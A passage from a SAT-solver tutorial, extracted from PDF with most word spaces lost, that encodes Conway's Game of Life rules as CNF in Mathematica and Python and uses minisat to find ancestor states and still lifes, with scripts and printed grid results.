{1,0,0,0,0,0,0,0,0}->0,
{0,0,0,0,0,0,0,0,1}->0,
{1,0,0,0,0,0,0,0,1}->0,
{0,0,0,0,0,0,0,1,0}->0,
{1,0,0,0,0,0,0,1,0}->0,
{0,0,0,0,0,0,0,1,1}->0,
{1,0,0,0,0,0,0,1,1}->1,
...
Nowwecancreatea CNF-expressionoutoftruthtable:
In[14]:= BooleanConvert[BooleanFunction[NewCellIsTrue,{center,a,b,c,d,e,f,g,h}],"CNF"]
Out[14]= (!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&
(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&
(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&
(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&
(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&
...
Also,weneedasecondfunction, invertedone ,whichwillreturn trueifthecellmustbeabsentinthenext
state,orfalseotherwise:
In[15]:= NewCellIsFalse=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]] ->
Boole[Not[newcell[center, neighbours]]],{neighbours,0,255},{center,0,1}]]
Out[15]= {{0,0,0,0,0,0,0,0,0}->1,
{1,0,0,0,0,0,0,0,0}->1,
{0,0,0,0,0,0,0,0,1}->1,
{1,0,0,0,0,0,0,0,1}->1,
{0,0,0,0,0,0,0,1,0}->1,
...
In[16]:= BooleanConvert[BooleanFunction[NewCellIsFalse,{center,a,b,c,d,e,f,g,h}],"CNF"]
Out[16]= (!a||!b||!c||d||e||f||g||h)&&(!a||!b||c||!d||e||f||g||h)&&(!a||!b||c||d||!e||f||g||h)&&
(!a||!b||c||d||e||!f||g||h)&&(!a||!b||c||d||e||f||!g||h)&&(!a||!b||c||d||e||f||g||!h)&&
(!a||!b||!center||d||e||f||g||h)&&(!a||b||!c||!d||e||f||g||h)&&(!a||b||!c||d||!e||f||g||h)&&
(!a||b||!c||d||e||!f||g||h)&&(!a||b||!c||d||e||f||!g||h)&&(!a||b||!c||d||e||f||g||!h)&&
(!a||b||c||!d||!e||f||g||h)&&(!a||b||c||!d||e||!f||g||h)&&(!a||b||c||!d||e||f||!g||h)&&
...
Usingtheverysamewayasinmy“Minesweeper”example,Icanconvert CNFexpressiontolistofclauses:
def mathematica_to_CNF (s, center, a):
s=s.replace("center", center)
s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3])
s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7])
s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "")
s=s.split ("&&")
return s
Andagain,asin“Minesweeper”,thereisaninvisibleborder,tomakeprocessingsimpler. SATvariables
arealsonumberedasinpreviousexample:
1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 16 17 18 19 20 21 22
23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44
...
100 101 102 103 104 105 106 107 108 109 110
111 112 113 114 115 116 117 118 119 120 121
135
Also,thereisavisibleborder,alwaysfixedto False,tomakethingssimpler.
Nowtheworkingsourcecode.Wheneverweencounter“*”in final_state[] ,weaddclausesgenerated
bycell_is_true() function,or cell_is_false() ifotherwise. Whenwegetasolution,itisnegatedand
addedtothelistofclauses,sowhenminisatisexecutednexttime,itwillskipsolutionwhichwasalready
printed.
...
def cell_is_false (center, a):
s="(!a||!b||!c||d||e||f||g||h)&&(!a||!b||c||!d||e||f||g||h)&&(!a||!b||c||d||!e||f||g||h)&&" \
"(!a||!b||c||d||e||!f||g||h)&&(!a||!b||c||d||e||f||!g||h)&&(!a||!b||c||d||e||f||g||!h)&&" \
"(!a||!b||!center||d||e||f||g||h)&&(!a||b||!c||!d||e||f||g||h)&&(!a||b||!c||d||!e||f||g||h)&&" \
"(!a||b||!c||d||e||!f||g||h)&&(!a||b||!c||d||e||f||!g||h)&&(!a||b||!c||d||e||f||g||!h)&&" \
"(!a||b||c||!d||!e||f||g||h)&&(!a||b||c||!d||e||!f||g||h)&&(!a||b||c||!d||e||f||!g||h)&&" \
"(!a||b||c||!d||e||f||g||!h)&&(!a||b||c||d||!e||!f||g||h)&&(!a||b||c||d||!e||f||!g||h)&&" \
"(!a||b||c||d||!e||f||g||!h)&&(!a||b||c||d||e||!f||!g||h)&&(!a||b||c||d||e||!f||g||!h)&&" \
"(!a||b||c||d||e||f||!g||!h)&&(!a||!c||!center||d||e||f||g||h)&&(!a||c||!center||!d||e||f||g||h)&&" \
"(!a||c||!center||d||!e||f||g||h)&&(!a||c||!center||d||e||!f||g||h)&&(!a||c||!center||d||e||f||!g||h)&&" \
"(!a||c||!center||d||e||f||g||!h)&&(a||!b||!c||!d||e||f||g||h)&&(a||!b||!c||d||!e||f||g||h)&&" \
"(a||!b||!c||d||e||!f||g||h)&&(a||!b||!c||d||e||f||!g||h)&&(a||!b||!c||d||e||f||g||!h)&&" \
"(a||!b||c||!d||!e||f||g||h)&&(a||!b||c||!d||e||!f||g||h)&&(a||!b||c||!d||e||f||!g||h)&&" \
"(a||!b||c||!d||e||f||g||!h)&&(a||!b||c||d||!e||!f||g||h)&&(a||!b||c||d||!e||f||!g||h)&&" \
"(a||!b||c||d||!e||f||g||!h)&&(a||!b||c||d||e||!f||!g||h)&&(a||!b||c||d||e||!f||g||!h)&&" \
"(a||!b||c||d||e||f||!g||!h)&&(a||b||!c||!d||!e||f||g||h)&&(a||b||!c||!d||e||!f||g||h)&&" \
"(a||b||!c||!d||e||f||!g||h)&&(a||b||!c||!d||e||f||g||!h)&&(a||b||!c||d||!e||!f||g||h)&&" \
"(a||b||!c||d||!e||f||!g||h)&&(a||b||!c||d||!e||f||g||!h)&&(a||b||!c||d||e||!f||!g||h)&&" \
"(a||b||!c||d||e||!f||g||!h)&&(a||b||!c||d||e||f||!g||!h)&&(a||b||c||!d||!e||!f||g||h)&&" \
"(a||b||c||!d||!e||f||!g||h)&&(a||b||c||!d||!e||f||g||!h)&&(a||b||c||!d||e||!f||!g||h)&&" \
"(a||b||c||!d||e||!f||g||!h)&&(a||b||c||!d||e||f||!g||!h)&&(a||b||c||d||!e||!f||!g||h)&&" \
"(a||b||c||d||!e||!f||g||!h)&&(a||b||c||d||!e||f||!g||!h)&&(a||b||c||d||e||!f||!g||!h)&&" \
"(!b||!c||!center||d||e||f||g||h)&&(!b||c||!center||!d||e||f||g||h)&&(!b||c||!center||d||!e||f||g||h)&&" \
"(!b||c||!center||d||e||!f||g||h)&&(!b||c||!center||d||e||f||!g||h)&&(!b||c||!center||d||e||f||g||!h)&&" \
"(b||!c||!center||!d||e||f||g||h)&&(b||!c||!center||d||!e||f||g||h)&&(b||!c||!center||d||e||!f||g||h)&&" \
"(b||!c||!center||d||e||f||!g||h)&&(b||!c||!center||d||e||f||g||!h)&&(b||c||!center||!d||!e||f||g||h)&&" \
"(b||c||!center||!d||e||!f||g||h)&&(b||c||!center||!d||e||f||!g||h)&&(b||c||!center||!d||e||f||g||!h)&&" \
"(b||c||!center||d||!e||!f||g||h)&&(b||c||!center||d||!e||f||!g||h)&&(b||c||!center||d||!e||f||g||!h)&&" \
"(b||c||!center||d||e||!f||!g||h)&&(b||c||!center||d||e||!f||g||!h)&&(b||c||!center||d||e||f||!g||!h)"
return mathematica_to_CNF(s, center, a)
def cell_is_true (center, a):
s="(!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&" \
"(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&" \
"(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&" \
"(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&" \
"(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&(!a||!c||!g||!h)&&" \
"(!a||!d||!e||!f)&&(!a||!d||!e||!g)&&(!a||!d||!e||!h)&&(!a||!d||!f||!g)&&(!a||!d||!f||!h)&&" \
"(!a||!d||!g||!h)&&(!a||!e||!f||!g)&&(!a||!e||!f||!h)&&(!a||!e||!g||!h)&&(!a||!f||!g||!h)&&" \
"(a||b||c||center||d||e||f)&&(a||b||c||center||d||e||g)&&(a||b||c||center||d||e||h)&&" \
"(a||b||c||center||d||f||g)&&(a||b||c||center||d||f||h)&&(a||b||c||center||d||g||h)&&" \
"(a||b||c||center||e||f||g)&&(a||b||c||center||e||f||h)&&(a||b||c||center||e||g||h)&&" \
"(a||b||c||center||f||g||h)&&(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&" \
"(a||b||c||d||f||g||h)&&(a||b||c||e||f||g||h)&&(a||b||center||d||e||f||g)&&(a||b||center||d||e||f||h)&&" \
"(a||b||center||d||e||g||h)&&(a||b||center||d||f||g||h)&&(a||b||center||e||f||g||h)&&" \
"(a||b||d||e||f||g||h)&&(a||c||center||d||e||f||g)&&(a||c||center||d||e||f||h)&&" \
"(a||c||center||d||e||g||h)&&(a||c||center||d||f||g||h)&&(a||c||center||e||f||g||h)&&" \
"(a||c||d||e||f||g||h)&&(a||center||d||e||f||g||h)&&(!b||!c||!d||!e)&&(!b||!c||!d||!f)&&" \
"(!b||!c||!d||!g)&&(!b||!c||!d||!h)&&(!b||!c||!e||!f)&&(!b||!c||!e||!g)&&(!b||!c||!e||!h)&&" \
"(!b||!c||!f||!g)&&(!b||!c||!f||!h)&&(!b||!c||!g||!h)&&(!b||!d||!e||!f)&&(!b||!d||!e||!g)&&" \
"(!b||!d||!e||!h)&&(!b||!d||!f||!g)&&(!b||!d||!f||!h)&&(!b||!d||!g||!h)&&(!b||!e||!f||!g)&&" \
"(!b||!e||!f||!h)&&(!b||!e||!g||!h)&&(!b||!f||!g||!h)&&(b||c||center||d||e||f||g)&&" \
"(b||c||center||d||e||f||h)&&(b||c||center||d||e||g||h)&&(b||c||center||d||f||g||h)&&" \
"(b||c||center||e||f||g||h)&&(b||c||d||e||f||g||h)&&(b||center||d||e||f||g||h)&&" \
"(!c||!d||!e||!f)&&(!c||!d||!e||!g)&&(!c||!d||!e||!h)&&(!c||!d||!f||!g)&&(!c||!d||!f||!h)&&" \
"(!c||!d||!g||!h)&&(!c||!e||!f||!g)&&(!c||!e||!f||!h)&&(!c||!e||!g||!h)&&(!c||!f||!g||!h)&&" \
"(c||center||d||e||f||g||h)&&(!d||!e||!f||!g)&&(!d||!e||!f||!h)&&(!d||!e||!g||!h)&&(!d||!f||!g||!h)&&" \
"(!e||!f||!g||!h)"
return mathematica_to_CNF(s, center, a)
...
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/GoL_SAT_utils.py )
136
#!/usr/bin/python
import os
from GoL_SAT_utils import *
final_state=[
" * ",
"* *",
" * "]
H=len(final_state) # HEIGHT
W=len(final_state[0]) # WIDTH
print "HEIGHT=", H, "WIDTH=", W
VARS_TOTAL=W*H+1
VAR_FALSE=str(VARS_TOTAL)
def try_again (clauses):
# rules for the main part of grid
for r in range(H):
for c in range(W):
if final_state[r][c]=="*":
clauses=clauses+cell_is_true(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
else:
clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
# cells behind visible grid must always be false:
for c in range(-1, W+1):
for r in [-1,H]:
clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
for c in [-1,W]:
for r in range(-1, H+1):
clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
write_CNF("tmp.cnf", clauses, VARS_TOTAL)
print "%d clauses" % len(clauses)
solution=run_minisat ("tmp.cnf")
os.remove("tmp.cnf")
if solution==None:
print "unsat!"
exit(0)
grid=SAT_solution_to_grid(solution, H, W)
print_grid(grid)
write_RLE(grid)
return grid
clauses=[]
# always false:
clauses.append ("-"+VAR_FALSE)
while True:
solution=try_again(clauses)
clauses.append(negate_clause(grid_to_clause(solution, H, W)))
print ""
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/reverse1.py )
Hereistheresult:
HEIGHT= 3 WIDTH= 3
2525 clauses
.*.
*.*
.*.
1.rle written
2526 clauses
.**
*..
*.*
2.rle written
137
2527 clauses
**.
..*
*.*
3.rle written
2528 clauses
*.*
*..
.**
4.rle written
2529 clauses
*.*
..*
**.
5.rle written
2530 clauses
*.*
.*.
*.*
6.rle written
2531 clauses
unsat!
Thefirstresultisthesameasinitialstate. Indeed: thisis“stilllife”,i.e.,statewhichwillneverchange,
anditiscorrectsolution. Thelastsolutionisalsovalid.
Now the problem: 2nd, 3rd, 4th and 5th solutions are equivalent to each other, they just mirrored or
rotated.Infact,thisisreflectional92(likeinmirror)androtational93symmetries.Wecansolvethiseasily:we
willtakeeachsolution,reflectandrotateitandaddthemnegatedtothelistofclauses,sominisatwillskip
themduringitswork:
...
while True:
solution=try_again(clauses)
clauses.append(negate_clause(grid_to_clause(solution, H, W)))
clauses.append(negate_clause(grid_to_clause(reflect_vertically(solution), H, W)))
clauses.append(negate_clause(grid_to_clause(reflect_horizontally(solution), H, W)))
# is this square?
if W==H:
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,1), H, W)))
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,2), H, W)))
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,3), H, W)))
print ""
...
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/reverse2.py )
Functions reflect_vertically() ,reflect_horizontally and rotate_squarearray() are simple
arraymanipulationroutines.
Nowwegetjust3solutions:
HEIGHT= 3 WIDTH= 3
2525 clauses
.*.
*.*
.*.
1.rle written
2531 clauses
.**
*..
*.*
2.rle written
92https://en.wikipedia.org/wiki/Reflection_symmetry
93https://en.wikipedia.org/wiki/Rotational_symmetry
138
2537 clauses
*.*
.*.
*.*
3.rle written
2543 clauses
unsat!
Thisonehasonlyonesingleancestor:
final_state=[
" * ",
" * ",
" * "]
_PRE_END
_PRE_BEGIN
HEIGHT= 3 WIDTH= 3
2503 clauses
...
***
...
1.rle written
2509 clauses
unsat!
Thisisoscillator,ofcourse.
Howmanystatescanleadtosuchpicture?
final_state=[
" * ",
" ",
" ** ",
" * ",
" * ",
" *** "]
28,thesearefew:
HEIGHT= 6 WIDTH= 5
5217 clauses
.*.*.
..*..
.**.*
..*..
..*.*
.**..
1.rle written
5220 clauses
.*.*.
..*..
.**.*
..*..
*.*.*
.**..
2.rle written
5223 clauses
..*.*
..**.
.**..
....*
*.*.*
.**..
3.rle written
5226 clauses
..*.*
..**.
.**..
*...*
..*.*
.**..
139
4.rle written
...
Nowthebiggest,“spaceinvader”:
final_state=[
" ",
" * * ",
" * * ",
" ******* ",
" ** *** ** ",
" *********** ",
" * ******* * ",
" * * * * ",
" ** ** ",
" "]
HEIGHT= 10 WIDTH= 13
16469 clauses
..*.*.**.....
.....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
1.rle written
16472 clauses
*.*.*.**.....
.....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
2.rle written
16475 clauses
..*.*.**.....
*....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
3.rle written
...
Idon’tknowhowmanypossiblestatescanleadto“spaceinvader”,perhaps,toomany. Hadtostopit.
Anditslowsdownduringexecution,becausenumberofclausesisincreasing(becauseofnegatingsolutions
addition).
AllsolutionsarealsoexportedtoRLEfiles,whichcanbeopenedbyGolly94.
11.4.2 Finding “still lives”
“Stilllife”intermsofGoLisastatewhichdoesn’tchangeatall.
First,usingpreviousdefinitions,wewilldefineatruthtableoffunction,whichwillreturn true,ifthecenter
cellofthenextstateisthesameasithasbeeninthepreviousstate,i.e.,hasn’tbeenchanged:
94http://golly.sourceforge.net/
140
In[17]:= stillife=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]]->
Boole[Boole[newcell[center,neighbours]]==center],{neighbours,0,255},{center,0,1}]]
Out[17]= {{0,0,0,0,0,0,0,0,0}->1,
{1,0,0,0,0,0,0,0,0}->0,
{0,0,0,0,0,0,0,0,1}->1,
{1,0,0,0,0,0,0,0,1}->0,
...
In[18]:= BooleanConvert[BooleanFunction[stillife,{center,a,b,c,d,e,f,g,h}],"CNF"]
Out[18]= (!a||!b||!c||!center||!d)&&(!a||!b||!c||!center||!e)&&(!a||!b||!c||!center||!f)&&
(!a||!b||!c||!center||!g)&&(!a||!b||!c||!center||!h)&&(!a||!b||!c||center||d||e||f||g||h)&&
(!a||!b||c||center||!d||e||f||g||h)&&(!a||!b||c||center||d||!e||f||g||h)&&(!a||!b||c||center||d||e||!f||g||h)&&
(!a||!b||c||center||d||e||f||!g||h)&&(!a||!b||c||center||d||e||f||g||!h)&&(!a||!b||!center||!d||!e)&&
...
#!/usr/bin/python
import os
from GoL_SAT_utils import *
W=3 # WIDTH
H=3 # HEIGHT
VARS_TOTAL=W*H+1
VAR_FALSE=str(VARS_TOTAL)
def stillife (center, a):
s="(!a||!b||!c||!center||!d)&&(!a||!b||!c||!center||!e)&&(!a||!b||!c||!center||!f)&&" \
"(!a||!b||!c||!center||!g)&&(!a||!b||!c||!center||!h)&&(!a||!b||!c||center||d||e||f||g||h)&&" \
"(!a||!b||c||center||!d||e||f||g||h)&&(!a||!b||c||center||d||!e||f||g||h)&&" \
"(!a||!b||c||center||d||e||!f||g||h)&&(!a||!b||c||center||d||e||f||!g||h)&&" \
"(!a||!b||c||center||d||e||f||g||!h)&&(!a||!b||!center||!d||!e)&&(!a||!b||!center||!d||!f)&&" \
"(!a||!b||!center||!d||!g)&&(!a||!b||!center||!d||!h)&&(!a||!b||!center||!e||!f)&&" \
"(!a||!b||!center||!e||!g)&&(!a||!b||!center||!e||!h)&&(!a||!b||!center||!f||!g)&&" \
"(!a||!b||!center||!f||!h)&&(!a||!b||!center||!g||!h)&&(!a||b||!c||center||!d||e||f||g||h)&&" \
"(!a||b||!c||center||d||!e||f||g||h)&&(!a||b||!c||center||d||e||!f||g||h)&&" \
"(!a||b||!c||center||d||e||f||!g||h)&&(!a||b||!c||center||d||e||f||g||!h)&&" \
"(!a||b||c||center||!d||!e||f||g||h)&&(!a||b||c||center||!d||e||!f||g||h)&&" \
"(!a||b||c||center||!d||e||f||!g||h)&&(!a||b||c||center||!d||e||f||g||!h)&&" \
"(!a||b||c||center||d||!e||!f||g||h)&&(!a||b||c||center||d||!e||f||!g||h)&&" \
"(!a||b||c||center||d||!e||f||g||!h)&&(!a||b||c||center||d||e||!f||!g||h)&&" \
"(!a||b||c||center||d||e||!f||g||!h)&&(!a||b||c||center||d||e||f||!g||!h)&&" \
"(!a||!c||!center||!d||!e)&&(!a||!c||!center||!d||!f)&&(!a||!c||!center||!d||!g)&&" \
"(!a||!c||!center||!d||!h)&&(!a||!c||!center||!e||!f)&&(!a||!c||!center||!e||!g)&&" \
"(!a||!c||!center||!e||!h)&&(!a||!c||!center||!f||!g)&&(!a||!c||!center||!f||!h)&&" \
"(!a||!c||!center||!g||!h)&&(!a||!center||!d||!e||!f)&&(!a||!center||!d||!e||!g)&&" \
"(!a||!center||!d||!e||!h)&&(!a||!center||!d||!f||!g)&&(!a||!center||!d||!f||!h)&&" \
"(!a||!center||!d||!g||!h)&&(!a||!center||!e||!f||!g)&&(!a||!center||!e||!f||!h)&&" \
"(!a||!center||!e||!g||!h)&&(!a||!center||!f||!g||!h)&&(a||!b||!c||center||!d||e||f||g||h)&&" \
"(a||!b||!c||center||d||!e||f||g||h)&&(a||!b||!c||center||d||e||!f||g||h)&&" \
"(a||!b||!c||center||d||e||f||!g||h)&&(a||!b||!c||center||d||e||f||g||!h)&&" \
"(a||!b||c||center||!d||!e||f||g||h)&&(a||!b||c||center||!d||e||!f||g||h)&&" \
"(a||!b||c||center||!d||e||f||!g||h)&&(a||!b||c||center||!d||e||f||g||!h)&&" \
"(a||!b||c||center||d||!e||!f||g||h)&&(a||!b||c||center||d||!e||f||!g||h)&&" \
"(a||!b||c||center||d||!e||f||g||!h)&&(a||!b||c||center||d||e||!f||!g||h)&&" \
"(a||!b||c||center||d||e||!f||g||!h)&&(a||!b||c||center||d||e||f||!g||!h)&&" \
"(a||b||!c||center||!d||!e||f||g||h)&&(a||b||!c||center||!d||e||!f||g||h)&&" \
"(a||b||!c||center||!d||e||f||!g||h)&&(a||b||!c||center||!d||e||f||g||!h)&&" \
"(a||b||!c||center||d||!e||!f||g||h)&&(a||b||!c||center||d||!e||f||!g||h)&&" \
"(a||b||!c||center||d||!e||f||g||!h)&&(a||b||!c||center||d||e||!f||!g||h)&&" \
"(a||b||!c||center||d||e||!f||g||!h)&&(a||b||!c||center||d||e||f||!g||!h)&&" \
"(a||b||c||!center||d||e||f||g)&&(a||b||c||!center||d||e||f||h)&&" \
"(a||b||c||!center||d||e||g||h)&&(a||b||c||!center||d||f||g||h)&&" \
"(a||b||c||!center||e||f||g||h)&&(a||b||c||center||!d||!e||!f||g||h)&&" \
"(a||b||c||center||!d||!e||f||!g||h)&&(a||b||c||center||!d||!e||f||g||!h)&&" \
"(a||b||c||center||!d||e||!f||!g||h)&&(a||b||c||center||!d||e||!f||g||!h)&&" \
"(a||b||c||center||!d||e||f||!g||!h)&&(a||b||c||center||d||!e||!f||!g||h)&&" \
"(a||b||c||center||d||!e||!f||g||!h)&&(a||b||c||center||d||!e||f||!g||!h)&&" \
"(a||b||c||center||d||e||!f||!g||!h)&&(a||b||!center||d||e||f||g||h)&&" \
"(a||c||!center||d||e||f||g||h)&&(!b||!c||!center||!d||!e)&&(!b||!c||!center||!d||!f)&&" \
"(!b||!c||!center||!d||!g)&&(!b||!c||!center||!d||!h)&&(!b||!c||!center||!e||!f)&&" \
"(!b||!c||!center||!e||!g)&&(!b||!c||!center||!e||!h)&&(!b||!c||!center||!f||!g)&&" \
"(!b||!c||!center||!f||!h)&&(!b||!c||!center||!g||!h)&&(!b||!center||!d||!e||!f)&&" \
141
"(!b||!center||!d||!e||!g)&&(!b||!center||!d||!e||!h)&&(!b||!center||!d||!f||!g)&&" \
"(!b||!center||!d||!f||!h)&&(!b||!center||!d||!g||!h)&&(!b||!center||!e||!f||!g)&&" \
"(!b||!center||!e||!f||!h)&&(!b||!center||!e||!g||!h)&&(!b||!center||!f||!g||!h)&&" \
"(b||c||!center||d||e||f||g||h)&&(!c||!center||!d||!e||!f)&&(!c||!center||!d||!e||!g)&&" \
"(!c||!center||!d||!e||!h)&&(!c||!center||!d||!f||!g)&&(!c||!center||!d||!f||!h)&&" \
"(!c||!center||!d||!g||!h)&&(!c||!center||!e||!f||!g)&&(!c||!center||!e||!f||!h)&&" \
"(!c||!center||!e||!g||!h)&&(!c||!center||!f||!g||!h)&&(!center||!d||!e||!f||!g)&&" \
"(!center||!d||!e||!f||!h)&&(!center||!d||!e||!g||!h)&&(!center||!d||!f||!g||!h)&&" \
"(!center||!e||!f||!g||!h)"
return mathematica_to_CNF(s, center, a)
def try_again (clauses):
# rules for the main part of grid
for r in range(H):
for c in range(W):
clauses=clauses+stillife(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
# cells behind visible grid must always be false:
for c in range(-1, W+1):
for r in [-1,H]:
clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
for c in [-1,W]:
for r in range(-1, H+1):
clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
write_CNF("tmp.cnf", clauses, VARS_TOTAL)
print "%d clauses" % len(clauses)
solution=run_minisat ("tmp.cnf")
os.remove("tmp.cnf")
if solution==None:
print "unsat!"
exit(0)
grid=SAT_solution_to_grid(solution, H, W)
print_grid(grid)
write_RLE(grid)
return grid
clauses=[]
# always false:
clauses.append ("-"+VAR_FALSE)
while True:
solution=try_again(clauses)
clauses.append(negate_clause(grid_to_clause(solution, H, W)))
clauses.append(negate_clause(grid_to_clause(reflect_vertically(solution), H, W)))
clauses.append(negate_clause(grid_to_clause(reflect_horizontally(solution), H, W)))
# is this square?
if W==H:
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,1), H, W)))
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,2), H, W)))
clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,3), H, W)))
print ""
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife1.py )
Whatwe’vegotfor 22?
1881 clauses
..
..
1.rle written
1887 clauses
**
**
2.rle written
1893 clauses
unsat!
Bothsolutionsarecorrect: emptysquarewillprogressintoemptysquare(nocellsareborn). 22boxis
142
alsoknown“stilllife”.
Whatabout 33square?
2887 clauses
...
...
...
1.rle written
2893 clauses
.**
.**
...
2.rle written
2899 clauses
.**
*.*
**.
3.rle written
2905 clauses
.*.
*.*
**.
4.rle written
2911 clauses
.*.
*.*
.*.
5.rle written
2917 clauses
unsat!
Here is a problem: we see familiar 22box, but shifted. This is indeed correct solution, but we don’t
interestedinit,becauseithasbeenalreadyseen.
Whatwecandoisaddanothercondition. Wecanforceminisattofindsolutionswithnoemptyrowsand
columns. Thisiseasy. TheseareSATvariablesfor 55square:
1 2 3 4 5
6 7 8 9 10
11 12 13 14 15
16 17 18 19 20
21 22 23 24 25
Eachclauseis“OR”clause,soallwehavetodoistoadd5clauses:
1 OR 2 OR 3 OR 4 OR 5
6 OR 7 OR 8 OR 9 OR 10
...
Thatmeansthateachrowmusthaveatleastone Truevaluesomewhere. Wecanalsodothisforeach
columnaswell.
...
# each row must contain at least one cell!
for r in range(H):
clauses.append(" ".join([coords_to_var(r, c, H, W) for c in range(W)]))
# each column must contain at least one cell!
for c in range(W):
clauses.append(" ".join([coords_to_var(r, c, H, W) for r in range(H)]))
...
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife2.py )
Nowwecanseethat 33squarehas3possible“stilllives”:
2893 clauses
.*.
143
*.*
**.
1.rle written
2899 clauses
.*.
*.*
.*.
2.rle written
2905 clauses
.**
*.*
**.
3.rle written
2911 clauses
unsat!
44has7:
4169 clauses
..**
...*
***.
*...
1.rle written
4175 clauses
..**
..*.
*.*.
**..
2.rle written
4181 clauses
..**
.*.*
*.*.
**..
3.rle written
4187 clauses
..*.
.*.*
*.*.
**..
4.rle written
4193 clauses
.**.
*..*
*.*.
.*..
5.rle written
4199 clauses
..*.
.*.*
*.*.
.*..
6.rle written
4205 clauses
.**.
*..*
*..*
.**.
7.rle written
4211 clauses
unsat!
WhenItrylargesquares, like 2020, funnythingshappen. Firstofall, minisatfindssolutionsnotvery
pleasingaesthetically,butstillcorrect,like:
144
61033 clauses
....**.**.**.**.**.*
**..*.**.**.**.**.**
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
..*.................
...*................
***.................
*...................
1.rle written
...
Indeed: allrowsandcolumnshasatleastone Truevalue.
Thenminisatbeginstoaddsmaller“stilllives”intothewholepicture:
61285 clauses
.**....**...**...**.
.**...*..*.*.*...*..
.......**...*......*
..................**
...**............*..
...*.*...........*..
....*.*........**...
**...*.*...**..*....
*.*...*....*....*...
.*..........****.*..
................*...
..*...**..******....
.*.*..*..*..........
*..*...*.*..****....
***.***..*.*....*...
....*..***.**..**...
**.*..*.............
.*.**.**..........**
*..*..*..*......*..*
**..**..**......**..
43.rle written
Inotherwords,resultisasquareconsistingofsmaller“stilllives”. Itthenalteringthesepartsslightly,
shiftingbackandforth. Isitcheating? Anyway,itdoesitinastrictaccordancetoruleswedefined.
Butwewant denserpicture. Wecanaddarule: inall5-cellchunkstheremustbeatleastone Truecell.
Toachievethis,wejustsplitthewholesquareby5-cellchunksandaddclauseforeach:
...
# make result denser:
lst=[]
for r in range(H):
for c in range(W):
lst.append(coords_to_var(r, c, H, W))
# divide them all by chunks and add to clauses:
CHUNK_LEN=5
for c in list_partition(lst,len(lst)/CHUNK_LEN):
tmp=" ".join(c)
clauses.append(tmp)
...
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife.py )
Thisisindeeddenser:
145
61113 clauses
..**.**......*.*.*..
...*.*.....***.**.*.
...*..*...*.......*.
....*.*..*.*......**
...**.*.*..*...**.*.
..*...*.***.....*.*.
...*.*.*......*..*..
****.*..*....*.**...
*....**.*....*.*....
...**..*...**..*....
..*..*....*....*.**.
.*.*.**....****.*..*
..*.*....*.*..*..**.
....*.****..*..*.*..
....**....*.*.**..*.
*.**...****.*..*.**.
**...**.....**.*....
...**..*..**..*.**.*
***.*.*..*.*..*.*.**
*....*....*....*....
1.rle written
61119 clauses
..**.**......*.*.*..
...*.*.....***.**.*.
...*..*...*.......*.
....*.*..*.*......**
...**.*.*..*...**.*.
..*...*.***.....*.*.
...*.*.*......*..*..
****.*..*....*.**...
*....**.*....*.*....
...**..*...**..*....
..*..*....*....*.**.
